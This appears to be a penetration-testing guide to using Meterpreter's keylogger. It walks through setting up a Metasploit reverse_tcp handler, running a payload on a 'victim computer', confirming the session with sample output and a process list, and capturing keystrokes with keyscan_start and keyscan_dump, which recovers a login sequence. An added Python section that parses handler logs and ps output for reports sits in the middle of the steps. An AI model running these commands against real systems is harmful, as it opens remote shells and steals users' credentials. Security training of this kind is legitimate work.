Meterpreter Keylogger

Introduction

Gaining access to credentials is a key phase of a penetration test, and Meterpreter offers a number of post-exploitation features that help an operator extract sensitive information from a compromised host. One notable capability is its built-in keylogger, which captures and records keystrokes on the target.

Step-by-Step Guide

1. Create the meterpreter binary

How-To: Creating a Meterpreter Binary

2. Create and run a listener

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <IP>
msf6 exploit(multi/handler) > set LPORT <PORT>
msf6 exploit(multi/handler) > exploit

3. Execute your meterpreter binary on the victim computer

4. Confirm connection

Sample handler output, followed by ‘ps’ to confirm the session is live:

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 172.28.99.163:9999
[*] Sending stage (175686 bytes) to 172.28.96.1
[*] Meterpreter session 1 opened (172.28.99.163:9999 -> 172.28.96.1:11322) at 2024-01-24 11:14:18 +1100

meterpreter > ps

Process List
============

 PID   PPID  Name         Arch  Session  User                Path
 ---   ----  ----         ----  -------  ----                ----
 0     0     [System Pro
             cess]
 4     0     System
 224   4     smss.exe
 296   288   csrss.exe
 308   432   svchost.exe
 344   288   wininit.exe
 356   336   csrss.exe
 396   336   winlogon.exe
 432   344   services.exe
 440   344   lsass.exe
 ...
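Console output like the above is usually what ends up in an engagement report or an incident timeline, so it is worth being able to turn it into structured records rather than copying values by hand. The following is an added example, not code from the page or from the Metasploit project: it parses the handler lines (listener, staged bytes, session open time) and the Meterpreter `ps` table into Python objects. The sample text is constructed from the output shown on this page, including the `[System Process]` name that Meterpreter wraps onto a second line, which the `ps` parser rejoins; the `...` truncation marker is skipped.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Optional

# Constructed sample: the handler output shown on this page.
HANDLER_LOG = """\
[*] Started reverse TCP handler on 172.28.99.163:9999
[*] Sending stage (175686 bytes) to 172.28.96.1
[*] Meterpreter session 1 opened (172.28.99.163:9999 -> 172.28.96.1:11322) at 2024-01-24 11:14:18 +1100
"""

# Constructed sample: the truncated `ps` table shown on this page.
PS_OUTPUT = """\
Process List
============

 PID   PPID  Name         Arch  Session  User                Path
 ---   ----  ----         ----  -------  ----                ----
 0     0     [System Pro
             cess]
 4     0     System
 224   4     smss.exe
 296   288   csrss.exe
 308   432   svchost.exe
 344   288   wininit.exe
 356   336   csrss.exe
 396   336   winlogon.exe
 432   344   services.exe
 440   344   lsass.exe
 ...
"""

STAGE_RE = re.compile(r"\[\*\] Sending stage \((?P<size>\d+) bytes\) to (?P<rhost>[\d.]+)")
SESSION_RE = re.compile(
    r"\[\*\] Meterpreter session (?P<id>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\) "
    r"at (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4})"
)
# A `ps` data row starts with two integer columns (PID, PPID) followed by the name.
PS_ROW_RE = re.compile(r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S.*?)\s*$")


@dataclass
class Session:
    session_id: int
    listener: str           # LHOST:LPORT the handler was bound to
    target: str             # target IP and its source port
    opened_at: datetime
    stage_bytes: Optional[int] = None   # size of the stage sent to this target, if seen


def parse_handler_log(text: str) -> list[Session]:
    """Return one Session per 'Meterpreter session N opened' line."""
    sessions: list[Session] = []
    last_stage: dict[str, int] = {}      # target IP -> last stage size sent to it
    for line in text.splitlines():
        m = STAGE_RE.match(line)
        if m:
            last_stage[m["rhost"]] = int(m["size"])
            continue
        m = SESSION_RE.match(line)
        if m:
            sessions.append(Session(
                session_id=int(m["id"]),
                listener=f"{m['lhost']}:{m['lport']}",
                target=f"{m['rhost']}:{m['rport']}",
                # %z accepts the "+1100" style offset Metasploit prints
                opened_at=datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S %z"),
                stage_bytes=last_stage.get(m["rhost"]),
            ))
    return sessions


def parse_ps(text: str) -> list[dict]:
    """Parse the Meterpreter `ps` table into dicts with pid, ppid and name.

    Meterpreter wraps long cell values onto an indented continuation line;
    such a line (no PID column) is glued back onto the previous row's name.
    """
    procs: list[dict] = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped == "...":
            continue                      # blank line or truncation marker
        m = PS_ROW_RE.match(line)
        if m:
            procs.append({"pid": int(m["pid"]), "ppid": int(m["ppid"]), "name": m["name"]})
        elif procs and line[:1].isspace():
            procs[-1]["name"] += stripped  # continuation of a wrapped cell
    return procs


if __name__ == "__main__":
    for s in parse_handler_log(HANDLER_LOG):
        print(s)
    for p in parse_ps(PS_OUTPUT):
        print(p)
```

The header and `---` rule lines never match `PS_ROW_RE` because their first column is not numeric, and they are ignored as continuations only because no data row has been seen yet; if you feed it a table whose header appears after data rows, guard on that explicitly.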

5. Start the keylogger

meterpreter > keyscan_start
Starting the keystroke sniffer ...

6. Dump the captured keystrokes

meterpreter > keyscan_dump
Dumping captured keystrokes...
win7<Tab>12345<Tab>12345

Reference

https://www.offsec.com/metasploit-unleashed/keylogging/#using-a-keylogger-with-metasploit